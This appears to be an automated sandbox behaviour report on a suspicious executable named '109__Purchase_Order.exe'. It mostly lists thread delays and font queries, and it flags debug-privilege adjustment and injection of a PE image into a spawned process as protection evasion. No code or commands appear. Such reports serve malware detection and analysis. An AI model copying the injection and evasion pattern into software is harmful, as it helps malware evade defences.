Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596169	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595835	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595623	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: 109__Purchase_Order.exe, 00000002.00000002.4074924929.00000000013D7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*"8

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Memory written: C:\Users\user\Desktop\109__Purchase_Order.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Process created: C:\Users\user\Desktop\109__Purchase_Order.exe "C:\Users\user\Desktop\109__Purchase_Order.exe"

Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Users\user\Desktop\109__Purchase_Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
